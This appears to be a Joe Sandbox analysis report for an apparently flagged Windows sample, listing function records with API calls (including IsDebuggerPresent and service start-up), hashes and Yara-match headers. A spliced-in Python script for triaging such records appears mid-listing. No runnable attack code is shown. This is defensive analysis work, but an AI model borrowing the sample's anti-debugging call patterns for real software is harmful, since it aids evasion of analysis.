                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Similarity
                                                • API ID: CurrentProcess$CloseOpenProfileQueryValueWow64
                                                • API String ID: 165412945-0
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: %#n$Hde
                                                • API String ID: 3732870572-2497800613
                                                Similarity
                                                • API ID:
                                                • String ID: Hde$Hde
                                                • API String ID: 0-984064285
                                                Similarity
                                                • API ID:
                                                • String ID: Hde$Hde
                                                • API String ID: 0-984064285
                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 0034CE2E
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0034CE38
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0034CE45
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • API String ID: 3906539128-0
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,00352632,?,?,?,?,?,00350D23), ref: 00352655
                                                • TerminateProcess.KERNEL32(00000000,?,00352632,?,?,?,?,?,00350D23), ref: 0035265C
                                                • ExitProcess.KERNEL32 ref: 0035266E
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • API String ID: 1703294689-0
                                                Similarity
                                                • API ID: __aulldiv
                                                • API String ID: 3732870572-0
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0035F0A8,?,?,00000008,?,?,0035ED40,00000000), ref: 0035F2DA
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • API String ID: 3997070919-0
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00349AAF
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • API String ID: 2325560087-0
                                                Similarity
                                                • String ID: Kw
                                                • API String ID: 0-954361344
                                                APIs
                                                • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 003203C2
                                                Similarity
                                                • API ID: CtrlDispatcherServiceStart
                                                • API String ID: 3789849863-0
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00039E1B,003498CC), ref: 00349E14
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: a41bfcfefe765b4134d0b8a22ba1b56e917431b5b528adf042519ee28f5123dc
                                                • Instruction ID: 51bdbab8e9de43527a103e94c64cd283d7c2ffc06f959eb34b51fef583f48b3c
                                                • Opcode Fuzzy Hash: a41bfcfefe765b4134d0b8a22ba1b56e917431b5b528adf042519ee28f5123dc
                                                • Instruction Fuzzy Hash:
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                 • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 07820f821ed346ae760eef299b2d27b0ea6fa5820f43bb61b37f850f6f272a5e
                                                • Instruction ID: 8af319cdb8e988bd6240a1f5c7d28114a36eaa739edd10ddedcc296c4eed91b5
                                                • Opcode Fuzzy Hash: 07820f821ed346ae760eef299b2d27b0ea6fa5820f43bb61b37f850f6f272a5e
                                                • Instruction Fuzzy Hash: 8451B9306006486BDF3B9A6CC495FBEA79E9B06343F1E061EDC42DBAB1C6519D4CC742
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                 • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: ebb6602eb0b6c7e4b31f6876df63fcf4475529bc40f52d4f6fb8c7dc26098351
                                                • Instruction ID: 19e8d6854137b26e6313e04115acf90bd2a66e4aba56267a688ab8dcb9b51552
                                                • Opcode Fuzzy Hash: ebb6602eb0b6c7e4b31f6876df63fcf4475529bc40f52d4f6fb8c7dc26098351
                                                • Instruction Fuzzy Hash: 39A011302882008F83028F3AAA083083AACBA02380B00C02AE002C2020EBA088208A00
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                 • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                • Instruction ID: dabea31d5d3769a9adcddcc703ecb8ba7753f8a9404359a0d3828aa390857c02
                                                • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                • Instruction Fuzzy Hash: 81818131618B418FC73ACF29C8906AAB7E2EFD9314F14C92DD0EA87751D738A849CB45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                 • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 438bd0cc8c98b336ea809296fdbdecc5e4b45dd137da17caf48dd9fc61ba5f12
                                                • Instruction ID: 997cd87245427569a70846328d7bf5eda6fa717464edb4475a4a6631fe13dc92
                                                • Opcode Fuzzy Hash: 438bd0cc8c98b336ea809296fdbdecc5e4b45dd137da17caf48dd9fc61ba5f12
                                                • Instruction Fuzzy Hash: DB518071E00119AFDF15CF99C981AAEBBB2EF98300F198099E915AF251C734AE55CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                 • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46d948bd289b0c8bbc97f903f7373f877a38da151df705f58fd91a7242504a17
                                                • Instruction ID: 20fc86df6ff796aa6fb02121b7090d316171a8bbb6b026424fa29a2226fec7a8
                                                • Opcode Fuzzy Hash: 46d948bd289b0c8bbc97f903f7373f877a38da151df705f58fd91a7242504a17
                                                • Instruction Fuzzy Hash: 0821B673F204394B770CC47E8C5227DB6E1C78C601745823AE8A6EA2C1D968D917E2E4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                 • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 756fbbe120759a0d4d1b667f01f63e3bd89c4e8745df63ab17ee48946445c1ff
                                                • Instruction ID: 3632440418714df61b42477415fbdbbc417b89a807cd57760178caf1bd6614cf
                                                • Opcode Fuzzy Hash: 756fbbe120759a0d4d1b667f01f63e3bd89c4e8745df63ab17ee48946445c1ff
                                                • Instruction Fuzzy Hash: 4A11CA23F30C255B775C816D8C1327AA1D6DBD824070F433ADC26E7284F8A4DE13D290
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                 • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction ID: 8f9e4feaa1bab178c7014e289a260805489fa86e9e5f4cb0076d37f98651cac5
                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction Fuzzy Hash: 36110DB72000C283DE178A7DD5F46B7A7A6EBC6321B2EC37AD0514B75CD223E9C5A600
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                 • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e6ded761d5ffa4682f073ad4b078057eac912a78cb4af02c888a94c68453cc92
                                                • Instruction ID: b5e0185288ac64f819c6e6b36e0fd24c68e61401a6c04fcf84d9e878428153f6
                                                • Opcode Fuzzy Hash: e6ded761d5ffa4682f073ad4b078057eac912a78cb4af02c888a94c68453cc92
                                                • Instruction Fuzzy Hash: E8E08C32D11228EBCB1ADB88E905D8AF7EDEB44B01B51409AF902D3120C270DE44CBD0
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 00358E12
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 003589C8
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 003589DA
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 003589EC
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 003589FE
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A10
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A22
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A34
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A46
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A58
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A6A
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A7C
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358A8E
                                                  • Part of subcall function 003589AB: _free.LIBCMT ref: 00358AA0
                                                • _free.LIBCMT ref: 00358E07
                                                  • Part of subcall function 003543F6: RtlFreeHeap.NTDLL(00000000,00000000,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?), ref: 0035440C
                                                  • Part of subcall function 003543F6: GetLastError.KERNEL32(?,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?,?), ref: 0035441E
                                                • _free.LIBCMT ref: 00358E29
                                                • _free.LIBCMT ref: 00358E3E
                                                • _free.LIBCMT ref: 00358E49
                                                • _free.LIBCMT ref: 00358E6B
                                                • _free.LIBCMT ref: 00358E7E
                                                • _free.LIBCMT ref: 00358E8C
                                                • _free.LIBCMT ref: 00358E97
                                                • _free.LIBCMT ref: 00358ECF
                                                • _free.LIBCMT ref: 00358ED6
                                                • _free.LIBCMT ref: 00358EF3
                                                • _free.LIBCMT ref: 00358F0B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                 • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID: @6$x6
                                                • API String ID: 161543041-3790332844
                                                • Opcode ID: 59ffe04663879b23d688498b927a5099fb5f5b2a46c8b778e1acea66e987d483
                                                • Instruction ID: 6cd057064c4e6b4320504d7cabfcebd65bc17112423351056e4c204233acb97d
                                                • Opcode Fuzzy Hash: 59ffe04663879b23d688498b927a5099fb5f5b2a46c8b778e1acea66e987d483
                                                • Instruction Fuzzy Hash: BC313A35600301AFEB26AB38D846F5B73F9EB00356F154829E859AB171DF74AC998710
                                                APIs
                                                • _free.LIBCMT ref: 00353999
                                                  • Part of subcall function 003543F6: RtlFreeHeap.NTDLL(00000000,00000000,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?), ref: 0035440C
                                                  • Part of subcall function 003543F6: GetLastError.KERNEL32(?,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?,?), ref: 0035441E
                                                • _free.LIBCMT ref: 003539A5
                                                • _free.LIBCMT ref: 003539B0
                                                • _free.LIBCMT ref: 003539BB
                                                • _free.LIBCMT ref: 003539C6
                                                • _free.LIBCMT ref: 003539D1
                                                • _free.LIBCMT ref: 003539DC
                                                • _free.LIBCMT ref: 003539E7
                                                • _free.LIBCMT ref: 003539F2
                                                • _free.LIBCMT ref: 00353A00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                 • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID: hN6
                                                • API String ID: 776569668-415610008
                                                • Opcode ID: ce188016e9b708351dc3f296e14d6de37b35a2fa3b68e1915809a77b59586602
                                                • Instruction ID: 1161e44ff9ab7c77606d1dd31d28425a2d30f1fbebbe1b3fa1e2393b13ba7f31
                                                • Opcode Fuzzy Hash: ce188016e9b708351dc3f296e14d6de37b35a2fa3b68e1915809a77b59586602
                                                • Instruction Fuzzy Hash: 9821897A900208BFCB46EF98C981DDE7BB5FF08345B014165B9159F132EB35DA998B80
                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0034B202
                                                • type_info::operator==.LIBVCRUNTIME ref: 0034B229
                                                • ___TypeMatch.LIBVCRUNTIME ref: 0034B335
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0034B410
                                                • _UnwindNestedFrames.LIBCMT ref: 0034B497
                                                • CallUnexpected.LIBVCRUNTIME ref: 0034B4B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                 • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2123188842-393685449
                                                • Opcode ID: 7e37a9e04d9ecf83dd62645b7f7b7c2bddb306281e62932d65bc4270a4246c01
                                                • Instruction ID: 3d0c048ad4049020ac65b565f2fce2b908adf7ce2183d95cfa3775c08997109a
                                                • Opcode Fuzzy Hash: 7e37a9e04d9ecf83dd62645b7f7b7c2bddb306281e62932d65bc4270a4246c01
                                                • Instruction Fuzzy Hash: 0FC16971900209AFCF2ADFA5C881AAEFBF5BF14310F05455AE8146F212D775EA61CF92
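The function records in this listing all share one layout: an optional APIs list (calls that the report attributes to a helper are indented as "Part of subcall function ADDR"), the Memory Dump Source block, and the Similarity fields, closed by the Instruction Fuzzy Hash. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses that layout into records, keeps each function's direct calls apart from the ones reached through a subcall helper, buckets each function for triage, and builds a reverse index from API to the records that reach it. The sample text is an abridged, constructed copy of records from this page; the module set treated as runtime code (LIBCMT, LIBVCRUNTIME) and the bucket names are this example's own assumptions.

```python
"""Parse Joe Sandbox per-function records (the APIs / Memory Dump Source /
Similarity blocks above) and bucket each function for triage.  Added example:
the bucket rules and the CRT module set are this example's own assumptions."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# "• Name.MODULE(args), ref: ADDR", or indented under the call that reaches it,
# "• Part of subcall function ADDR: Name.MODULE(args), ref: ADDR".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
CRT_MODULES = {"LIBCMT", "LIBVCRUNTIME"}  # assumption: statically linked runtime
ApiRef = namedtuple("ApiRef", "name module ref via_subcall")  # via_subcall: helper addr or None

@dataclass
class FunctionRecord:
    fields: dict = field(default_factory=dict)  # API ID, String ID, hashes, ...
    apis: list = field(default_factory=list)    # ApiRef entries, in listing order

def parse_records(text):
    """Split the listing into records; 'Instruction Fuzzy Hash' closes each one."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            cur.apis.append(ApiRef(m["name"], m["module"], m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        cur.fields.setdefault(m["key"], m["val"])  # first 'Associated:' wins
        if m["key"] == "Instruction Fuzzy Hash":   # last field of every record
            records.append(cur)
            cur = FunctionRecord()
    if cur.fields or cur.apis:  # listing cut off mid-record
        records.append(cur)
    return records

def classify(rec):
    """Bucket on direct calls only: RtlFreeHeap reached through the _free helper
    is runtime plumbing and must not promote a CRT function to 'win32'."""
    direct = {a.module for a in rec.apis if a.via_subcall is None}
    if direct - CRT_MODULES:
        return "win32"
    if direct:
        return "crt"
    return "unresolved" if rec.fields.get("API ID") else "none"

def index_by_api(records):
    """Map 'Name.MODULE' to the record indices that reach it, directly or not."""
    idx = {}
    for i, rec in enumerate(records):
        for a in rec.apis:
            idx.setdefault(f"{a.name}.{a.module}", set()).add(i)
    return {k: sorted(v) for k, v in idx.items()}

# Constructed sample: four records abridged from the listing on this page.
SAMPLE = """\
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00039E1B,003498CC), ref: 00349E14
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• Instruction Fuzzy Hash:
APIs
Similarity
• API ID: HeapProcess
• Instruction Fuzzy Hash: 39A011302882008F83028F3AAA083083AACBA02380B00C02AE002C2020EBA088208A00
APIs
• _free.LIBCMT ref: 00353999
  • Part of subcall function 003543F6: RtlFreeHeap.NTDLL(00000000,00000000,?,00358B3C,?), ref: 0035440C
  • Part of subcall function 003543F6: GetLastError.KERNEL32(?,?,00358B3C,?), ref: 0035441E
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID: hN6
• Instruction Fuzzy Hash: 9821897A900208BFCB46EF98C981DDE7BB5FF08345B014165B9159F132EB35DA998B80
APIs
• IsInExceptionSpec.LIBVCRUNTIME ref: 0034B202
• type_info::operator==.LIBVCRUNTIME ref: 0034B229
Similarity
• String ID: csm$csm$csm
• Instruction Fuzzy Hash: 0FC16971900209AFCF2ADFA5C881AAEFBF5BF14310F05455AE8146F212D775EA61CF92
"""
```

Run `parse_records(SAMPLE)` and map `classify` over the result: the SetUnhandledExceptionFilter function lands in `win32`, the two CRT functions in `crt` even though the report lists RtlFreeHeap and GetLastError beneath `_free`, and the HeapProcess record, whose call list was not rendered, in `unresolved`. Filtering the full listing to `win32` and `unresolved` is the quickest way to set aside the statically linked runtime and look only at code the sample's author wrote.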
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                 • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                APIs
                                                  • Part of subcall function 00359B53: CreateFileW.KERNEL32(00000000,00000000,?,00359F43,?,?,00000000,?,00359F43,00000000,0000000C), ref: 00359B70
                                                • GetLastError.KERNEL32 ref: 00359FAE
                                                • __dosmaperr.LIBCMT ref: 00359FB5
                                                • GetFileType.KERNEL32(00000000), ref: 00359FC1
                                                • GetLastError.KERNEL32 ref: 00359FCB
                                                • __dosmaperr.LIBCMT ref: 00359FD4
                                                • CloseHandle.KERNEL32(00000000), ref: 00359FF4
                                                • CloseHandle.KERNEL32(?), ref: 0035A141
                                                • GetLastError.KERNEL32 ref: 0035A173
                                                • __dosmaperr.LIBCMT ref: 0035A17A
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID:
